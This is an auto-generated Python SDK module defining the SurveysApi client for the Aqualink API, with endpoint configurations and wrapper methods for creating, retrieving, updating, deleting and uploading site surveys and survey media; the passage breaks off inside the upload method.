"""
Aqualink API documentation
The Aqualink public API documentation # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from aqualink_sdk.api_client import ApiClient, Endpoint as _Endpoint
from aqualink_sdk.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from aqualink_sdk.model.create_survey_dto import CreateSurveyDto
from aqualink_sdk.model.create_survey_media_dto import CreateSurveyMediaDto
from aqualink_sdk.model.edit_survey_dto import EditSurveyDto
from aqualink_sdk.model.edit_survey_media_dto import EditSurveyMediaDto
from aqualink_sdk.model.inline_response404 import InlineResponse404
from aqualink_sdk.model.survey import Survey
from aqualink_sdk.model.survey_media import SurveyMedia
class SurveysApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.surveys_controller_create_endpoint = _Endpoint(
settings={
'response_type': (Survey,),
'auth': [
'bearer'
],
'endpoint_path': '/sites/{siteId}/surveys',
'operation_id': 'surveys_controller_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'site_id',
'create_survey_dto',
],
'required': [
'site_id',
'create_survey_dto',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'create_survey_dto':
(CreateSurveyDto,),
},
'attribute_map': {
'site_id': 'siteId',
},
'location_map': {
'site_id': 'path',
'create_survey_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.surveys_controller_create_media_endpoint = _Endpoint(
settings={
'response_type': (SurveyMedia,),
'auth': [
'bearer'
],
'endpoint_path': '/sites/{siteId}/surveys/{id}/media',
'operation_id': 'surveys_controller_create_media',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'site_id',
'id',
'create_survey_media_dto',
],
'required': [
'site_id',
'id',
'create_survey_media_dto',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'id':
(float,),
'create_survey_media_dto':
(CreateSurveyMediaDto,),
},
'attribute_map': {
'site_id': 'siteId',
'id': 'id',
},
'location_map': {
'site_id': 'path',
'id': 'path',
'create_survey_media_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.surveys_controller_delete_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'bearer'
],
'endpoint_path': '/sites/{siteId}/surveys/{id}',
'operation_id': 'surveys_controller_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'site_id',
'id',
],
'required': [
'site_id',
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'id':
(float,),
},
'attribute_map': {
'site_id': 'siteId',
'id': 'id',
},
'location_map': {
'site_id': 'path',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.surveys_controller_delete_media_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'bearer'
],
'endpoint_path': '/sites/{siteId}/surveys/media/{id}',
'operation_id': 'surveys_controller_delete_media',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'site_id',
'id',
],
'required': [
'site_id',
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'id':
(float,),
},
'attribute_map': {
'site_id': 'siteId',
'id': 'id',
},
'location_map': {
'site_id': 'path',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.surveys_controller_find_endpoint = _Endpoint(
settings={
'response_type': ([Survey],),
'auth': [],
'endpoint_path': '/sites/{siteId}/surveys',
'operation_id': 'surveys_controller_find',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'site_id',
],
'required': [
'site_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
},
'attribute_map': {
'site_id': 'siteId',
},
'location_map': {
'site_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.surveys_controller_find_media_endpoint = _Endpoint(
settings={
'response_type': ([SurveyMedia],),
'auth': [],
'endpoint_path': '/sites/{siteId}/surveys/{id}/media',
'operation_id': 'surveys_controller_find_media',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'site_id',
'id',
],
'required': [
'site_id',
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'id':
(float,),
},
'attribute_map': {
'site_id': 'siteId',
'id': 'id',
},
'location_map': {
'site_id': 'path',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.surveys_controller_find_one_endpoint = _Endpoint(
settings={
'response_type': (Survey,),
'auth': [],
'endpoint_path': '/sites/{siteId}/surveys/{id}',
'operation_id': 'surveys_controller_find_one',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'site_id',
'id',
],
'required': [
'site_id',
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'id':
(float,),
},
'attribute_map': {
'site_id': 'siteId',
'id': 'id',
},
'location_map': {
'site_id': 'path',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.surveys_controller_update_endpoint = _Endpoint(
settings={
'response_type': (Survey,),
'auth': [
'bearer'
],
'endpoint_path': '/sites/{siteId}/surveys/{id}',
'operation_id': 'surveys_controller_update',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'site_id',
'id',
'edit_survey_dto',
],
'required': [
'site_id',
'id',
'edit_survey_dto',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'id':
(float,),
'edit_survey_dto':
(EditSurveyDto,),
},
'attribute_map': {
'site_id': 'siteId',
'id': 'id',
},
'location_map': {
'site_id': 'path',
'id': 'path',
'edit_survey_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.surveys_controller_update_media_endpoint = _Endpoint(
settings={
'response_type': (SurveyMedia,),
'auth': [
'bearer'
],
'endpoint_path': '/sites/{siteId}/surveys/media/{id}',
'operation_id': 'surveys_controller_update_media',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'site_id',
'id',
'edit_survey_media_dto',
],
'required': [
'site_id',
'id',
'edit_survey_media_dto',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'id':
(float,),
'edit_survey_media_dto':
(EditSurveyMediaDto,),
},
'attribute_map': {
'site_id': 'siteId',
'id': 'id',
},
'location_map': {
'site_id': 'path',
'id': 'path',
'edit_survey_media_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.surveys_controller_upload_endpoint = _Endpoint(
settings={
'response_type': (str,),
'auth': [
'bearer'
],
'endpoint_path': '/sites/{siteId}/surveys/upload',
'operation_id': 'surveys_controller_upload',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'site_id',
'file',
],
'required': [
'site_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'file':
(file_type,),
},
'attribute_map': {
'site_id': 'siteId',
'file': 'file',
},
'location_map': {
'site_id': 'path',
'file': 'form',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'multipart/form-data'
]
},
api_client=api_client
)
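The constructor above binds every endpoint to a shared `ApiClient`. A minimal sketch of building an authenticated `SurveysApi` — assuming the package-level `Configuration` class with an `access_token` field that OpenAPI Generator normally emits; the token value is a placeholder:

```python
def make_surveys_api(token=None):
    """Build a SurveysApi, optionally authenticated with a bearer token.

    `Configuration` and its `access_token` field are assumed from the
    standard OpenAPI Generator package layout; pass token=None for the
    unauthenticated (read-only) endpoints.
    """
    # Imports are deferred so this sketch stays importable on its own.
    import aqualink_sdk
    from aqualink_sdk.api.surveys_api import SurveysApi

    configuration = aqualink_sdk.Configuration(access_token=token)
    client = aqualink_sdk.ApiClient(configuration)
    return SurveysApi(client)
```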
def surveys_controller_create(
self,
site_id,
create_survey_dto,
**kwargs
):
"""Creates a new survey # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_create(site_id, create_survey_dto, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
create_survey_dto (CreateSurveyDto):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Survey
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['create_survey_dto'] = \
create_survey_dto
return self.surveys_controller_create_endpoint.call_with_http_info(**kwargs)
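A hedged sketch of calling the create endpoint. The `CreateSurveyDto` fields are defined in `aqualink_sdk.model` and are not shown in this file, so the DTO is taken as a prepared argument; `ApiException` is assumed to be re-exported from the package root, as in standard OpenAPI Generator clients:

```python
def create_survey(api, site_id, survey_dto):
    """POST /sites/{siteId}/surveys (bearer auth required).

    `api` is a SurveysApi instance; `survey_dto` is a CreateSurveyDto
    built elsewhere. Returns the deserialized Survey model.
    """
    from aqualink_sdk import ApiException  # assumed package-root re-export

    try:
        return api.surveys_controller_create(site_id, survey_dto)
    except ApiException as exc:
        # 404 bodies deserialize to InlineResponse404 per the imports above
        print(f"create failed: {exc.status} {exc.reason}")
        raise
```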
def surveys_controller_create_media(
self,
site_id,
id,
create_survey_media_dto,
**kwargs
):
"""Creates a new survey media # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_create_media(site_id, id, create_survey_media_dto, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
id (float):
create_survey_media_dto (CreateSurveyMediaDto):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SurveyMedia
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['id'] = \
id
kwargs['create_survey_media_dto'] = \
create_survey_media_dto
return self.surveys_controller_create_media_endpoint.call_with_http_info(**kwargs)
def surveys_controller_delete(
self,
site_id,
id,
**kwargs
):
"""Deletes a specified survey # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_delete(site_id, id, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
id (float):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['id'] = \
id
return self.surveys_controller_delete_endpoint.call_with_http_info(**kwargs)
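The delete endpoint declares `'response_type': None`, so a successful call returns nothing. A sketch that treats a 404 as "already gone" — `ApiException` and its `status` attribute are assumed from the standard generated client:

```python
def delete_survey(api, site_id, survey_id):
    """DELETE /sites/{siteId}/surveys/{id}; returns None on success."""
    from aqualink_sdk import ApiException  # assumed package-root re-export

    try:
        api.surveys_controller_delete(site_id, survey_id)
    except ApiException as exc:
        if exc.status == 404:
            return  # survey was already deleted; treat as success
        raise
```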
def surveys_controller_delete_media(
self,
site_id,
id,
**kwargs
):
"""Deletes a specified survey media # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_delete_media(site_id, id, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
id (float):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['id'] = \
id
return self.surveys_controller_delete_media_endpoint.call_with_http_info(**kwargs)
def surveys_controller_find(
self,
site_id,
**kwargs
):
"""Returns all site's survey # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_find(site_id, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Survey]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
return self.surveys_controller_find_endpoint.call_with_http_info(**kwargs)
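Unlike the write endpoints, `surveys_controller_find` declares `'auth': []`, so it can be called without a token. A sketch using a bare `ApiClient` (the context-manager form is assumed from the standard generated client):

```python
def list_surveys(site_id):
    """GET /sites/{siteId}/surveys; public, no bearer token required."""
    import aqualink_sdk
    from aqualink_sdk.api.surveys_api import SurveysApi

    # Default Configuration, no credentials: fine for 'auth': [] endpoints.
    with aqualink_sdk.ApiClient() as client:
        api = SurveysApi(client)
        return api.surveys_controller_find(site_id)
```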
def surveys_controller_find_media(
self,
site_id,
id,
**kwargs
):
"""Returns all media of a specified survey # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_find_media(site_id, id, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
id (float):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[SurveyMedia]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['id'] = \
id
return self.surveys_controller_find_media_endpoint.call_with_http_info(**kwargs)
def surveys_controller_find_one(
self,
site_id,
id,
**kwargs
):
"""Returns specified survey # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_find_one(site_id, id, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
id (float):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Survey
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['id'] = \
id
return self.surveys_controller_find_one_endpoint.call_with_http_info(**kwargs)
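Every method accepts `async_req=True`, in which case it returns a thread-pool result object instead of the model, exactly as the `>>>` examples in the docstrings show. A sketch that fires the request and then blocks for the deserialized `Survey`:

```python
def fetch_survey_async(api, site_id, survey_id):
    """Run find_one on the client's thread pool, then block for the result."""
    thread = api.surveys_controller_find_one(site_id, survey_id, async_req=True)
    # .get() blocks until the HTTP response is received and deserialized.
    return thread.get()
```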
def surveys_controller_update(
self,
site_id,
id,
edit_survey_dto,
**kwargs
):
"""Updates a specified survey # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_update(site_id, id, edit_survey_dto, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
id (float):
edit_survey_dto (EditSurveyDto):
Keyword Args:
            _return_http_data_only (bool): return the response data only,
                without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it will be the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Survey
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['id'] = \
id
kwargs['edit_survey_dto'] = \
edit_survey_dto
return self.surveys_controller_update_endpoint.call_with_http_info(**kwargs)
def surveys_controller_update_media(
self,
site_id,
id,
edit_survey_media_dto,
**kwargs
):
"""Updates a specified survey media # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_update_media(site_id, id, edit_survey_media_dto, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
id (float):
edit_survey_media_dto (EditSurveyMediaDto):
Keyword Args:
            _return_http_data_only (bool): return the response data only,
                without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it will be the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SurveyMedia
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['id'] = \
id
kwargs['edit_survey_media_dto'] = \
edit_survey_media_dto
return self.surveys_controller_update_media_endpoint.call_with_http_info(**kwargs)
def surveys_controller_upload(
self,
site_id,
**kwargs
):
"""Uploads a new survey media # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_upload(site_id, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
Keyword Args:
file (file_type): The image to upload (image/jpeg, image/png, image/tiff). Max size: 50MB. [optional]
            _return_http_data_only (bool): return the response data only,
                without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it will be the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
str
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
